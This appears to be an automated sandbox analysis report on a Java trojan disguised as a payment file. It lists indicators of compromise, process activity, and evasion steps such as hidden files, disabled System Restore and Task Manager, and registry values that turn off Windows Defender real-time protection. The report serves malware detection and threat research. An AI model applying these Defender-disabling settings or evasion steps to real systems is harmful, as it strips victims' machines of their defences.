8510f0b1edfeb2313ecc62eeb689e7bd91a3751e9221347572d2a74d94b3fc81

Analysis

max time kernel
148s
max time network
151s
platform
windows10_x64
resource
win10v200430
submitted
07/07/2020, 18:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

07072020-Payment.jar
Size

406KB
MD5

6b2bffb955ed0df1fd3d239fcbbcbf3d
SHA1

22e1f5e279b30023c131260c82e66777afcc4e53
SHA256

8510f0b1edfeb2313ecc62eeb689e7bd91a3751e9221347572d2a74d94b3fc81
SHA512

1ca70934661f12da702aea00fcd66c369ff5b97a121ab295c7c276cd8285832dcc30a98d65bdda48d3225d6e3f9dcad0b0e141a1d863eed153f057a4934f4781

Score

10^/10

persistence evasion trojan discovery

Malware Config

Signatures

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2876	attrib.exe
2236	attrib.exe
3176	attrib.exe
3868	attrib.exe
3952	attrib.exe
700	attrib.exe
3572	attrib.exe
2536	attrib.exe

Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3692	java.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3692	java.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\cHyEf	java.exe
File created	C:\Windows\System32\cHyEf	java.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe

Suspicious use of WriteProcessMemory 412 IoCs

description	pid	Process	procid_target
PID 3692 wrote to memory of 1460	3692	java.exe	67
PID 3692 wrote to memory of 1460	3692	java.exe	67
PID 3692 wrote to memory of 1732	3692	java.exe	69
PID 3692 wrote to memory of 1732	3692	java.exe	69
PID 1732 wrote to memory of 1920	1732	cmd.exe	71
PID 1732 wrote to memory of 1920	1732	cmd.exe	71
PID 3692 wrote to memory of 2104	3692	java.exe	72
PID 3692 wrote to memory of 2104	3692	java.exe	72
PID 2104 wrote to memory of 2212	2104	cmd.exe	74
PID 2104 wrote to memory of 2212	2104	cmd.exe	74
PID 3692 wrote to memory of 2536	3692	java.exe	75
PID 3692 wrote to memory of 2536	3692	java.exe	75
PID 3692 wrote to memory of 2876	3692	java.exe	77
PID 3692 wrote to memory of 2876	3692	java.exe	77
PID 3692 wrote to memory of 2236	3692	java.exe	79
PID 3692 wrote to memory of 2236	3692	java.exe	79
PID 3692 wrote to memory of 3176	3692	java.exe	80
PID 3692 wrote to memory of 3176	3692	java.exe	80
PID 3692 wrote to memory of 3868	3692	java.exe	82
PID 3692 wrote to memory of 3868	3692	java.exe	82
PID 3692 wrote to memory of 3952	3692	java.exe	84
PID 3692 wrote to memory of 3952	3692	java.exe	84
PID 3692 wrote to memory of 700	3692	java.exe	87
PID 3692 wrote to memory of 700	3692	java.exe	87
PID 3692 wrote to memory of 3572	3692	java.exe	88
PID 3692 wrote to memory of 3572	3692	java.exe	88
PID 3692 wrote to memory of 2276	3692	java.exe	91
PID 3692 wrote to memory of 2276	3692	java.exe	91
PID 2276 wrote to memory of 3076	2276	cmd.exe	93
PID 2276 wrote to memory of 3076	2276	cmd.exe	93
PID 3692 wrote to memory of 3740	3692	java.exe	94
PID 3692 wrote to memory of 3740	3692	java.exe	94
PID 3692 wrote to memory of 3764	3692	java.exe	95
PID 3692 wrote to memory of 3764	3692	java.exe	95
PID 3692 wrote to memory of 3840	3692	java.exe	96
PID 3692 wrote to memory of 3840	3692	java.exe	96
PID 3692 wrote to memory of 924	3692	java.exe	97
PID 3692 wrote to memory of 924	3692	java.exe	97
PID 3692 wrote to memory of 1040	3692	java.exe	101
PID 3692 wrote to memory of 1040	3692	java.exe	101
PID 3692 wrote to memory of 1292	3692	java.exe	103
PID 3692 wrote to memory of 1292	3692	java.exe	103
PID 3692 wrote to memory of 1520	3692	java.exe	105
PID 3692 wrote to memory of 1520	3692	java.exe	105
PID 3692 wrote to memory of 2484	3692	java.exe	108
PID 3692 wrote to memory of 2484	3692	java.exe	108
PID 3692 wrote to memory of 2684	3692	java.exe	109
PID 3692 wrote to memory of 2684	3692	java.exe	109
PID 3692 wrote to memory of 3864	3692	java.exe	112
PID 3692 wrote to memory of 3864	3692	java.exe	112
PID 3692 wrote to memory of 2980	3692	java.exe	113
PID 3692 wrote to memory of 2980	3692	java.exe	113
PID 2276 wrote to memory of 3828	2276	cmd.exe	115
PID 2276 wrote to memory of 3828	2276	cmd.exe	115
PID 3692 wrote to memory of 3432	3692	java.exe	116
PID 3692 wrote to memory of 3432	3692	java.exe	116
PID 3692 wrote to memory of 908	3692	java.exe	119
PID 3692 wrote to memory of 908	3692	java.exe	119
PID 3692 wrote to memory of 3056	3692	java.exe	121
PID 3692 wrote to memory of 3056	3692	java.exe	121
PID 3692 wrote to memory of 1036	3692	java.exe	123
PID 3692 wrote to memory of 1036	3692	java.exe	123
PID 3692 wrote to memory of 2680	3692	java.exe	124
PID 3692 wrote to memory of 2680	3692	java.exe	124
PID 3692 wrote to memory of 2920	3692	java.exe	125
PID 3692 wrote to memory of 2920	3692	java.exe	125
PID 3692 wrote to memory of 2804	3692	java.exe	128
PID 3692 wrote to memory of 2804	3692	java.exe	128
PID 3692 wrote to memory of 3076	3692	java.exe	130
PID 3692 wrote to memory of 3076	3692	java.exe	130
PID 3692 wrote to memory of 2484	3692	java.exe	133
PID 3692 wrote to memory of 2484	3692	java.exe	133
PID 3692 wrote to memory of 2284	3692	java.exe	134
PID 3692 wrote to memory of 2284	3692	java.exe	134
PID 3692 wrote to memory of 2428	3692	java.exe	137
PID 3692 wrote to memory of 2428	3692	java.exe	137
PID 3692 wrote to memory of 1420	3692	java.exe	138
PID 3692 wrote to memory of 1420	3692	java.exe	138
PID 3692 wrote to memory of 1000	3692	java.exe	139
PID 3692 wrote to memory of 1000	3692	java.exe	139
PID 3692 wrote to memory of 2632	3692	java.exe	143
PID 3692 wrote to memory of 2632	3692	java.exe	143
PID 3692 wrote to memory of 2840	3692	java.exe	144
PID 3692 wrote to memory of 2840	3692	java.exe	144
PID 3692 wrote to memory of 2536	3692	java.exe	148
PID 3692 wrote to memory of 2536	3692	java.exe	148
PID 3692 wrote to memory of 2876	3692	java.exe	149
PID 3692 wrote to memory of 2876	3692	java.exe	149
PID 3692 wrote to memory of 2104	3692	java.exe	152
PID 3692 wrote to memory of 2104	3692	java.exe	152
PID 3692 wrote to memory of 1560	3692	java.exe	153
PID 3692 wrote to memory of 1560	3692	java.exe	153
PID 3692 wrote to memory of 3888	3692	java.exe	156
PID 3692 wrote to memory of 3888	3692	java.exe	156
PID 3692 wrote to memory of 3976	3692	java.exe	158
PID 3692 wrote to memory of 3976	3692	java.exe	158
PID 3692 wrote to memory of 584	3692	java.exe	160
PID 3692 wrote to memory of 584	3692	java.exe	160
PID 3692 wrote to memory of 1884	3692	java.exe	162
PID 3692 wrote to memory of 1884	3692	java.exe	162
PID 2920 wrote to memory of 2484	2920	cmd.exe	163
PID 2920 wrote to memory of 2484	2920	cmd.exe	163
PID 3692 wrote to memory of 1788	3692	java.exe	165
PID 3692 wrote to memory of 1788	3692	java.exe	165
PID 3692 wrote to memory of 2524	3692	java.exe	167
PID 3692 wrote to memory of 2524	3692	java.exe	167
PID 3692 wrote to memory of 1292	3692	java.exe	168
PID 3692 wrote to memory of 1292	3692	java.exe	168
PID 2920 wrote to memory of 1460	2920	cmd.exe	171
PID 2920 wrote to memory of 1460	2920	cmd.exe	171
PID 3692 wrote to memory of 1040	3692	java.exe	172
PID 3692 wrote to memory of 1040	3692	java.exe	172
PID 1040 wrote to memory of 3868	1040	cmd.exe	175
PID 1040 wrote to memory of 3868	1040	cmd.exe	175
PID 1040 wrote to memory of 1560	1040	cmd.exe	176
PID 1040 wrote to memory of 1560	1040	cmd.exe	176
PID 3692 wrote to memory of 2108	3692	java.exe	177
PID 3692 wrote to memory of 2108	3692	java.exe	177
PID 3692 wrote to memory of 1820	3692	java.exe	179
PID 3692 wrote to memory of 1820	3692	java.exe	179
PID 2108 wrote to memory of 3900	2108	cmd.exe	181
PID 2108 wrote to memory of 3900	2108	cmd.exe	181
PID 2108 wrote to memory of 2280	2108	cmd.exe	182
PID 2108 wrote to memory of 2280	2108	cmd.exe	182
PID 3692 wrote to memory of 1524	3692	java.exe	184
PID 3692 wrote to memory of 1524	3692	java.exe	184
PID 1524 wrote to memory of 2124	1524	cmd.exe	186
PID 1524 wrote to memory of 2124	1524	cmd.exe	186
PID 1524 wrote to memory of 972	1524	cmd.exe	187
PID 1524 wrote to memory of 972	1524	cmd.exe	187
PID 3692 wrote to memory of 3840	3692	java.exe	188
PID 3692 wrote to memory of 3840	3692	java.exe	188
PID 3840 wrote to memory of 2876	3840	cmd.exe	190
PID 3840 wrote to memory of 2876	3840	cmd.exe	190
PID 3840 wrote to memory of 3820	3840	cmd.exe	191
PID 3840 wrote to memory of 3820	3840	cmd.exe	191
PID 3692 wrote to memory of 2632	3692	java.exe	192
PID 3692 wrote to memory of 2632	3692	java.exe	192
PID 2632 wrote to memory of 1548	2632	cmd.exe	194
PID 2632 wrote to memory of 1548	2632	cmd.exe	194
PID 2632 wrote to memory of 3936	2632	cmd.exe	195
PID 2632 wrote to memory of 3936	2632	cmd.exe	195
PID 3692 wrote to memory of 3456	3692	java.exe	196
PID 3692 wrote to memory of 3456	3692	java.exe	196
PID 3456 wrote to memory of 2492	3456	cmd.exe	198
PID 3456 wrote to memory of 2492	3456	cmd.exe	198
PID 3456 wrote to memory of 2200	3456	cmd.exe	199
PID 3456 wrote to memory of 2200	3456	cmd.exe	199
PID 3692 wrote to memory of 2280	3692	java.exe	200
PID 3692 wrote to memory of 2280	3692	java.exe	200
PID 2280 wrote to memory of 1820	2280	cmd.exe	202
PID 2280 wrote to memory of 1820	2280	cmd.exe	202
PID 2280 wrote to memory of 1944	2280	cmd.exe	204
PID 2280 wrote to memory of 1944	2280	cmd.exe	204
PID 3692 wrote to memory of 2680	3692	java.exe	205
PID 3692 wrote to memory of 2680	3692	java.exe	205
PID 3692 wrote to memory of 1868	3692	java.exe	207
PID 3692 wrote to memory of 1868	3692	java.exe	207
PID 2680 wrote to memory of 1548	2680	cmd.exe	209
PID 2680 wrote to memory of 1548	2680	cmd.exe	209
PID 2680 wrote to memory of 1604	2680	cmd.exe	210
PID 2680 wrote to memory of 1604	2680	cmd.exe	210
PID 3692 wrote to memory of 2496	3692	java.exe	211
PID 3692 wrote to memory of 2496	3692	java.exe	211
PID 2496 wrote to memory of 1944	2496	cmd.exe	213
PID 2496 wrote to memory of 1944	2496	cmd.exe	213
PID 2496 wrote to memory of 3760	2496	cmd.exe	214
PID 2496 wrote to memory of 3760	2496	cmd.exe	214
PID 3692 wrote to memory of 1732	3692	java.exe	215
PID 3692 wrote to memory of 1732	3692	java.exe	215
PID 1732 wrote to memory of 3860	1732	cmd.exe	217
PID 1732 wrote to memory of 3860	1732	cmd.exe	217
PID 1732 wrote to memory of 2492	1732	cmd.exe	218
PID 1732 wrote to memory of 2492	1732	cmd.exe	218
PID 3692 wrote to memory of 1460	3692	java.exe	219
PID 3692 wrote to memory of 1460	3692	java.exe	219
PID 1460 wrote to memory of 1048	1460	cmd.exe	221
PID 1460 wrote to memory of 1048	1460	cmd.exe	221
PID 1460 wrote to memory of 2872	1460	cmd.exe	222
PID 1460 wrote to memory of 2872	1460	cmd.exe	222
PID 3692 wrote to memory of 3160	3692	java.exe	223
PID 3692 wrote to memory of 3160	3692	java.exe	223
PID 3160 wrote to memory of 3820	3160	cmd.exe	225
PID 3160 wrote to memory of 3820	3160	cmd.exe	225
PID 3160 wrote to memory of 3720	3160	cmd.exe	226
PID 3160 wrote to memory of 3720	3160	cmd.exe	226
PID 3692 wrote to memory of 2212	3692	java.exe	227
PID 3692 wrote to memory of 2212	3692	java.exe	227
PID 3692 wrote to memory of 2280	3692	java.exe	229
PID 3692 wrote to memory of 2280	3692	java.exe	229
PID 2212 wrote to memory of 3976	2212	cmd.exe	231
PID 2212 wrote to memory of 3976	2212	cmd.exe	231
PID 2212 wrote to memory of 776	2212	cmd.exe	232
PID 2212 wrote to memory of 776	2212	cmd.exe	232
PID 3692 wrote to memory of 3980	3692	java.exe	233
PID 3692 wrote to memory of 3980	3692	java.exe	233
PID 3980 wrote to memory of 3744	3980	cmd.exe	235
PID 3980 wrote to memory of 3744	3980	cmd.exe	235
PID 3980 wrote to memory of 764	3980	cmd.exe	236
PID 3980 wrote to memory of 764	3980	cmd.exe	236
PID 3692 wrote to memory of 3972	3692	java.exe	237
PID 3692 wrote to memory of 3972	3692	java.exe	237
PID 3972 wrote to memory of 416	3972	cmd.exe	239
PID 3972 wrote to memory of 416	3972	cmd.exe	239
PID 3972 wrote to memory of 2592	3972	cmd.exe	240
PID 3972 wrote to memory of 2592	3972	cmd.exe	240
PID 3692 wrote to memory of 3844	3692	java.exe	241
PID 3692 wrote to memory of 3844	3692	java.exe	241
PID 3844 wrote to memory of 3880	3844	cmd.exe	243
PID 3844 wrote to memory of 3880	3844	cmd.exe	243
PID 3844 wrote to memory of 2872	3844	cmd.exe	244
PID 3844 wrote to memory of 2872	3844	cmd.exe	244
PID 3692 wrote to memory of 4044	3692	java.exe	245
PID 3692 wrote to memory of 4044	3692	java.exe	245
PID 4044 wrote to memory of 3456	4044	cmd.exe	247
PID 4044 wrote to memory of 3456	4044	cmd.exe	247
PID 4044 wrote to memory of 2484	4044	cmd.exe	248
PID 4044 wrote to memory of 2484	4044	cmd.exe	248
PID 3692 wrote to memory of 1940	3692	java.exe	249
PID 3692 wrote to memory of 1940	3692	java.exe	249
PID 1940 wrote to memory of 1560	1940	cmd.exe	251
PID 1940 wrote to memory of 1560	1940	cmd.exe	251
PID 1940 wrote to memory of 1204	1940	cmd.exe	252
PID 1940 wrote to memory of 1204	1940	cmd.exe	252
PID 3692 wrote to memory of 2292	3692	java.exe	253
PID 3692 wrote to memory of 2292	3692	java.exe	253
PID 3692 wrote to memory of 2980	3692	java.exe	254
PID 3692 wrote to memory of 2980	3692	java.exe	254
PID 2980 wrote to memory of 2492	2980	cmd.exe	257
PID 2980 wrote to memory of 2492	2980	cmd.exe	257
PID 2980 wrote to memory of 3024	2980	cmd.exe	258
PID 2980 wrote to memory of 3024	2980	cmd.exe	258
PID 3692 wrote to memory of 2536	3692	java.exe	259
PID 3692 wrote to memory of 2536	3692	java.exe	259
PID 2536 wrote to memory of 3976	2536	cmd.exe	261
PID 2536 wrote to memory of 3976	2536	cmd.exe	261
PID 2536 wrote to memory of 780	2536	cmd.exe	262
PID 2536 wrote to memory of 780	2536	cmd.exe	262
PID 3692 wrote to memory of 3736	3692	java.exe	263
PID 3692 wrote to memory of 3736	3692	java.exe	263
PID 3736 wrote to memory of 2524	3736	cmd.exe	265
PID 3736 wrote to memory of 2524	3736	cmd.exe	265
PID 3736 wrote to memory of 3752	3736	cmd.exe	266
PID 3736 wrote to memory of 3752	3736	cmd.exe	266
PID 3692 wrote to memory of 3020	3692	java.exe	267
PID 3692 wrote to memory of 3020	3692	java.exe	267
PID 3020 wrote to memory of 3688	3020	cmd.exe	269
PID 3020 wrote to memory of 3688	3020	cmd.exe	269
PID 3020 wrote to memory of 776	3020	cmd.exe	270
PID 3020 wrote to memory of 776	3020	cmd.exe	270
PID 3692 wrote to memory of 1560	3692	java.exe	271
PID 3692 wrote to memory of 1560	3692	java.exe	271
PID 1560 wrote to memory of 2524	1560	cmd.exe	273
PID 1560 wrote to memory of 2524	1560	cmd.exe	273
PID 1560 wrote to memory of 416	1560	cmd.exe	274
PID 1560 wrote to memory of 416	1560	cmd.exe	274
PID 3692 wrote to memory of 2284	3692	java.exe	275
PID 3692 wrote to memory of 2284	3692	java.exe	275
PID 2284 wrote to memory of 1048	2284	cmd.exe	277
PID 2284 wrote to memory of 1048	2284	cmd.exe	277
PID 2284 wrote to memory of 2524	2284	cmd.exe	278
PID 2284 wrote to memory of 2524	2284	cmd.exe	278
PID 3692 wrote to memory of 3688	3692	java.exe	279
PID 3692 wrote to memory of 3688	3692	java.exe	279
PID 3688 wrote to memory of 416	3688	cmd.exe	281
PID 3688 wrote to memory of 416	3688	cmd.exe	281
PID 3688 wrote to memory of 2524	3688	cmd.exe	282
PID 3688 wrote to memory of 2524	3688	cmd.exe	282
PID 3692 wrote to memory of 416	3692	java.exe	283
PID 3692 wrote to memory of 416	3692	java.exe	283
PID 416 wrote to memory of 4112	416	cmd.exe	285
PID 416 wrote to memory of 4112	416	cmd.exe	285
PID 416 wrote to memory of 4132	416	cmd.exe	286
PID 416 wrote to memory of 4132	416	cmd.exe	286
PID 3692 wrote to memory of 4152	3692	java.exe	287
PID 3692 wrote to memory of 4152	3692	java.exe	287
PID 4152 wrote to memory of 4188	4152	cmd.exe	289
PID 4152 wrote to memory of 4188	4152	cmd.exe	289
PID 3692 wrote to memory of 4208	3692	java.exe	290
PID 3692 wrote to memory of 4208	3692	java.exe	290
PID 4152 wrote to memory of 4228	4152	cmd.exe	292
PID 4152 wrote to memory of 4228	4152	cmd.exe	292
PID 3692 wrote to memory of 4268	3692	java.exe	293
PID 3692 wrote to memory of 4268	3692	java.exe	293
PID 4268 wrote to memory of 4324	4268	cmd.exe	295
PID 4268 wrote to memory of 4324	4268	cmd.exe	295
PID 4268 wrote to memory of 4344	4268	cmd.exe	296
PID 4268 wrote to memory of 4344	4268	cmd.exe	296
PID 3692 wrote to memory of 4364	3692	java.exe	297
PID 3692 wrote to memory of 4364	3692	java.exe	297
PID 4364 wrote to memory of 4400	4364	cmd.exe	299
PID 4364 wrote to memory of 4400	4364	cmd.exe	299
PID 4364 wrote to memory of 4416	4364	cmd.exe	300
PID 4364 wrote to memory of 4416	4364	cmd.exe	300
PID 3692 wrote to memory of 4432	3692	java.exe	301
PID 3692 wrote to memory of 4432	3692	java.exe	301
PID 4432 wrote to memory of 4468	4432	cmd.exe	303
PID 4432 wrote to memory of 4468	4432	cmd.exe	303
PID 4432 wrote to memory of 4488	4432	cmd.exe	304
PID 4432 wrote to memory of 4488	4432	cmd.exe	304
PID 3692 wrote to memory of 4508	3692	java.exe	305
PID 3692 wrote to memory of 4508	3692	java.exe	305
PID 4508 wrote to memory of 4544	4508	cmd.exe	307
PID 4508 wrote to memory of 4544	4508	cmd.exe	307
PID 4508 wrote to memory of 4564	4508	cmd.exe	308
PID 4508 wrote to memory of 4564	4508	cmd.exe	308
PID 3692 wrote to memory of 4584	3692	java.exe	309
PID 3692 wrote to memory of 4584	3692	java.exe	309
PID 4584 wrote to memory of 4620	4584	cmd.exe	311
PID 4584 wrote to memory of 4620	4584	cmd.exe	311
PID 4584 wrote to memory of 4640	4584	cmd.exe	312
PID 4584 wrote to memory of 4640	4584	cmd.exe	312
PID 3692 wrote to memory of 4660	3692	java.exe	313
PID 3692 wrote to memory of 4660	3692	java.exe	313
PID 4660 wrote to memory of 4696	4660	cmd.exe	315
PID 4660 wrote to memory of 4696	4660	cmd.exe	315
PID 4660 wrote to memory of 4716	4660	cmd.exe	316
PID 4660 wrote to memory of 4716	4660	cmd.exe	316
PID 3692 wrote to memory of 4736	3692	java.exe	317
PID 3692 wrote to memory of 4736	3692	java.exe	317
PID 4736 wrote to memory of 4772	4736	cmd.exe	319
PID 4736 wrote to memory of 4772	4736	cmd.exe	319
PID 4736 wrote to memory of 4788	4736	cmd.exe	320
PID 4736 wrote to memory of 4788	4736	cmd.exe	320
PID 3692 wrote to memory of 4804	3692	java.exe	321
PID 3692 wrote to memory of 4804	3692	java.exe	321
PID 4804 wrote to memory of 4844	4804	cmd.exe	323
PID 4804 wrote to memory of 4844	4804	cmd.exe	323
PID 4804 wrote to memory of 4864	4804	cmd.exe	324
PID 4804 wrote to memory of 4864	4804	cmd.exe	324
PID 3692 wrote to memory of 4884	3692	java.exe	325
PID 3692 wrote to memory of 4884	3692	java.exe	325
PID 3692 wrote to memory of 4904	3692	java.exe	327
PID 3692 wrote to memory of 4904	3692	java.exe	327
PID 4904 wrote to memory of 4968	4904	cmd.exe	329
PID 4904 wrote to memory of 4968	4904	cmd.exe	329
PID 4904 wrote to memory of 4996	4904	cmd.exe	330
PID 4904 wrote to memory of 4996	4904	cmd.exe	330
PID 3692 wrote to memory of 5012	3692	java.exe	331
PID 3692 wrote to memory of 5012	3692	java.exe	331
PID 5012 wrote to memory of 5048	5012	cmd.exe	333
PID 5012 wrote to memory of 5048	5012	cmd.exe	333
PID 5012 wrote to memory of 5068	5012	cmd.exe	334
PID 5012 wrote to memory of 5068	5012	cmd.exe	334
PID 3692 wrote to memory of 5088	3692	java.exe	335
PID 3692 wrote to memory of 5088	3692	java.exe	335
PID 5088 wrote to memory of 4120	5088	cmd.exe	337
PID 5088 wrote to memory of 4120	5088	cmd.exe	337
PID 5088 wrote to memory of 4112	5088	cmd.exe	338
PID 5088 wrote to memory of 4112	5088	cmd.exe	338
PID 3692 wrote to memory of 4160	3692	java.exe	339
PID 3692 wrote to memory of 4160	3692	java.exe	339
PID 4160 wrote to memory of 4188	4160	cmd.exe	341
PID 4160 wrote to memory of 4188	4160	cmd.exe	341
PID 4160 wrote to memory of 4284	4160	cmd.exe	342
PID 4160 wrote to memory of 4284	4160	cmd.exe	342
PID 3692 wrote to memory of 4260	3692	java.exe	343
PID 3692 wrote to memory of 4260	3692	java.exe	343
PID 4260 wrote to memory of 4240	4260	cmd.exe	345
PID 4260 wrote to memory of 4240	4260	cmd.exe	345
PID 4260 wrote to memory of 4352	4260	cmd.exe	346
PID 4260 wrote to memory of 4352	4260	cmd.exe	346
PID 3692 wrote to memory of 4344	3692	java.exe	347
PID 3692 wrote to memory of 4344	3692	java.exe	347
PID 4344 wrote to memory of 2876	4344	cmd.exe	349
PID 4344 wrote to memory of 2876	4344	cmd.exe	349
PID 4344 wrote to memory of 1336	4344	cmd.exe	350
PID 4344 wrote to memory of 1336	4344	cmd.exe	350
PID 3692 wrote to memory of 3840	3692	java.exe	351
PID 3692 wrote to memory of 3840	3692	java.exe	351
PID 3840 wrote to memory of 1872	3840	cmd.exe	353
PID 3840 wrote to memory of 1872	3840	cmd.exe	353
PID 3840 wrote to memory of 3704	3840	cmd.exe	354
PID 3840 wrote to memory of 3704	3840	cmd.exe	354
PID 3692 wrote to memory of 3756	3692	java.exe	355
PID 3692 wrote to memory of 3756	3692	java.exe	355
PID 3756 wrote to memory of 1672	3756	cmd.exe	357
PID 3756 wrote to memory of 1672	3756	cmd.exe	357
PID 3756 wrote to memory of 2492	3756	cmd.exe	358
PID 3756 wrote to memory of 2492	3756	cmd.exe	358
PID 3692 wrote to memory of 4180	3692	java.exe	359
PID 3692 wrote to memory of 4180	3692	java.exe	359
PID 4180 wrote to memory of 1732	4180	cmd.exe	361
PID 4180 wrote to memory of 1732	4180	cmd.exe	361
PID 4180 wrote to memory of 3972	4180	cmd.exe	362
PID 4180 wrote to memory of 3972	4180	cmd.exe	362
PID 3692 wrote to memory of 2980	3692	java.exe	363
PID 3692 wrote to memory of 2980	3692	java.exe	363
PID 2980 wrote to memory of 3892	2980	cmd.exe	365
PID 2980 wrote to memory of 3892	2980	cmd.exe	365
PID 2980 wrote to memory of 3684	2980	cmd.exe	366
PID 2980 wrote to memory of 3684	2980	cmd.exe	366
PID 3692 wrote to memory of 3572	3692	java.exe	367
PID 3692 wrote to memory of 3572	3692	java.exe	367
PID 3692 wrote to memory of 2276	3692	java.exe	369
PID 3692 wrote to memory of 2276	3692	java.exe	369
PID 3692 wrote to memory of 3752	3692	java.exe	372
PID 3692 wrote to memory of 3752	3692	java.exe	372
PID 3692 wrote to memory of 4440	3692	java.exe	374
PID 3692 wrote to memory of 4440	3692	java.exe	374
PID 3692 wrote to memory of 4544	3692	java.exe	376
PID 3692 wrote to memory of 4544	3692	java.exe	376
PID 3692 wrote to memory of 4796	3692	java.exe	380
PID 3692 wrote to memory of 4796	3692	java.exe	380
PID 3692 wrote to memory of 4880	3692	java.exe	382
PID 3692 wrote to memory of 4880	3692	java.exe	382
PID 3692 wrote to memory of 5028	3692	java.exe	384
PID 3692 wrote to memory of 5028	3692	java.exe	384
PID 3692 wrote to memory of 4884	3692	java.exe	386
PID 3692 wrote to memory of 4884	3692	java.exe	386
PID 3692 wrote to memory of 4140	3692	java.exe	388
PID 3692 wrote to memory of 4140	3692	java.exe	388

Loads dropped DLL 1 IoCs

pid	Process
3692	java.exe

Disables Task Manager via registry modification
evasion

Checks for installed software on the system 1 TTPs 38 IoCs

discovery

Query Registry

T1012

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe
Key queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key opened	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key enumerated	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	reg.exe
